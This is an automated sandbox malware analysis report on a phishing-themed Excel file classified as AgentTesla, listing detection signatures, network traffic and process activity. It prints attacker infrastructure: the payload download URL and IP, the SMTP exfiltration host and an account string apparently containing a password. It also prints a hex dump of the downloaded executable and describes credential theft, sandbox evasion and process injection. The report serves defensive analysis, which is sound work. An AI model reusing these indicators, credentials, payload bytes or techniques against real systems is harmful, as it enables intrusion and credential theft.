Windows Analysis Report Request for Quotation (RFQ).xlsx

Overview

General Information

Sample Name: Request for Quotation (RFQ).xlsx
Analysis ID: 435319
MD5: 84c78e6de4ef5f0c45f463953f7974ec
SHA1: 3018a8907c25585afb95d899d7e02414c57f87f5
SHA256: 2cea67f41e7e4bc7a0d6a29cc9d5ad722e976f51546941abe407a0a9db61e5d9
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "ventas@mftecnologia.com.uyVentas.1us2.smtp.mailhostbox.com"}
Multi AV Scanner detection for submitted file
Source: Request for Quotation (RFQ).xlsx Metadefender: Detection: 28% Perma Link
Source: Request for Quotation (RFQ).xlsx ReversingLabs: Detection: 34%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: NativeObjectSecurity.pdb( source: vbc.exe, 00000004.00000002.2140067412.0000000000902000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2139065825.0000000000902000.00000020.00020000.sdmp, vbc.exe.2.dr
Source: Binary string: NativeObjectSecurity.pdb source: vbc.exe, vbc.exe.2.dr

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: us2.smtp.mailhostbox.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.227.228.121:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.227.228.121:80

Networking:

barindex
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:14:31 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 16 Jun 2021 02:35:20 GMTETag: "d2200-5c4d8f11f527c"Accept-Ranges: bytesContent-Length: 860672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 63 c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 da 0c 00 00 46 00 00 00 00 00 00 4e f9 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f9 0c 00 4b 00 00 00 00 00 0d 00 0c 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 b3 f8 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 d9 0c 00 00 20 00 00 00 da 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 0c 42 00 00 00 00 0d 00 00 44 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 f9 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 00 27 01 00 48 05 01 00 03 00 00 00 01 00 00 06 48 2c 02 00 6b cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 12 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 c5 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 00 00 00 00 38 45 00 00 00 02 16 28 08 00 00 06 20 05 00 00 00 28 06 00 00 06 3a 2f 00 00 00 38 2a 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 19 00 00 00 02 16 28 11 00 00 0a 38 32 00 00 00 20 00 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 10 00 00 00 96 ff ff ff b1 ff ff ff 00 00 00 00 31 00 00 00 c2 ff ff ff 96 ff ff ff 48 00 00 00 38 2c 00 00 00 26 20 04 00 00 00 38 cb ff ff ff 02 16 28 07 00 00 06 28 06 00 00 06 28 05 00 00 06 39 df ff ff ff 26 20 06 00 00 00 38 aa ff ff ff 02 16 28 09 00 00 06 20 02 00 00 00 28 05 00 00 06 3a 94 ff ff ff 26 2a 00 00 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 12 00 00 0a 2a 00 00 56 2b 02 26 16 02 28 14 00 00 06 28 0d 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.91.198.143 208.91.198.143
Source: Joe Sandbox View IP Address: 192.227.228.121 192.227.228.121
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /dan.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.228.121Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: unknown TCP traffic detected without corresponding DNS query: 192.227.228.121
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A8387D5.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /dan.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.228.121Connection: Keep-Alive
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: us2.smtp.mailhostbox.com
Source: vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp String found in binary or memory: http://DPosyL.com
Source: vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2351581799.00000000023F0000.00000004.00000001.sdmp String found in binary or memory: http://MzDfYxjI5Zul5lFh.org
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: vbc.exe, 00000005.00000002.2351030318.00000000008B3000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vbc.exe, 00000005.00000002.2352850587.000000000520C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2351030318.00000000008B3000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0A
Source: vbc.exe, 00000005.00000002.2353179521.0000000005CB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2140354304.0000000002191000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2354088257.0000000006E60000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000005.00000002.2351519000.00000000023CA000.00000004.00000001.sdmp String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: vbc.exe, 00000005.00000002.2353179521.0000000005CB0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: 6A8387D5.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe String found in binary or memory: https://github.com/georgw777/
Source: vbc.exe String found in binary or memory: https://github.com/georgw777/MediaManager
Source: vbc.exe, 00000004.00000002.2140067412.0000000000902000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2139065825.0000000000902000.00000020.00020000.sdmp, vbc.exe.2.dr String found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

barindex
.NET source code contains very large array initializations
Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b558E043Bu002d0375u002d4F7Eu002dA6B1u002d60EBB83B20C5u007d/u00354970C80u002dE6D6u002d42F4u002d921Cu002d3E2A4D9C1D46.cs Large array initialization: .cctor: array initializer size 11942
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dan[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046BA68 4_2_0046BA68
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046DAB0 4_2_0046DAB0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00468FC0 4_2_00468FC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046543A 4_2_0046543A
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046E9B0 4_2_0046E9B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046FBD8 4_2_0046FBD8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00462C60 4_2_00462C60
Source: C:\Users\Public\vbc.exe Code function: 4_2_00464E40 4_2_00464E40
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046AEE8 4_2_0046AEE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F104D8 4_2_01F104D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F195D7 4_2_01F195D7
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F155C8 4_2_01F155C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F14D30 4_2_01F14D30
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F15D10 4_2_01F15D10
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F15D00 4_2_01F15D00
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F14CF8 4_2_01F14CF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F104C8 4_2_01F104C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F11060 4_2_01F11060
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F10048 4_2_01F10048
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F19829 4_2_01F19829
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F10006 4_2_01F10006
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F197F4 4_2_01F197F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F163F8 4_2_01F163F8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F163E8 4_2_01F163E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F197C1 4_2_01F197C1
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F197CD 4_2_01F197CD
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F10FB8 4_2_01F10FB8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F16B9D 4_2_01F16B9D
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F16B3A 4_2_01F16B3A
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F14728 4_2_01F14728
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F102F8 4_2_01F102F8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F102E8 4_2_01F102E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F146B7 4_2_01F146B7
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F16A98 4_2_01F16A98
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F15E76 4_2_01F15E76
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F15A60 4_2_01F15A60
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F16A49 4_2_01F16A49
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F19222 4_2_01F19222
Source: C:\Users\Public\vbc.exe Code function: 4_2_01F15E05 4_2_01F15E05
Source: C:\Users\Public\vbc.exe Code function: 5_2_0023B8B8 5_2_0023B8B8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00235320 5_2_00235320
Source: C:\Users\Public\vbc.exe Code function: 5_2_00236340 5_2_00236340
Source: C:\Users\Public\vbc.exe Code function: 5_2_00235668 5_2_00235668
Source: C:\Users\Public\vbc.exe Code function: 5_2_00232089 5_2_00232089
Source: C:\Users\Public\vbc.exe Code function: 5_2_0023F4C8 5_2_0023F4C8
Source: C:\Users\Public\vbc.exe Code function: 5_2_002A5E08 5_2_002A5E08
Source: C:\Users\Public\vbc.exe Code function: 5_2_002AD650 5_2_002AD650
Source: C:\Users\Public\vbc.exe Code function: 5_2_002A7688 5_2_002A7688
Source: C:\Users\Public\vbc.exe Code function: 5_2_002A4CE0 5_2_002A4CE0
Source: C:\Users\Public\vbc.exe Code function: 5_2_002A9FC0 5_2_002A9FC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_002A29D8 5_2_002A29D8
Source: C:\Users\Public\vbc.exe Code function: 5_2_002A9638 5_2_002A9638
Source: C:\Users\Public\vbc.exe Code function: 5_2_002ADC30 5_2_002ADC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_002A11A8 5_2_002A11A8
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Request for Quotation (RFQ).xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: dan[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dan[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dan[1].exe.2.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: dan[1].exe.2.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.900000.1.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vbc.exe.900000.1.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.900000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.vbc.exe.900000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.vbc.exe.900000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.vbc.exe.900000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Request for Quotation (RFQ).xlsx Jump to behavior
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\iEPRTNxcoChyZ
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD5D5.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
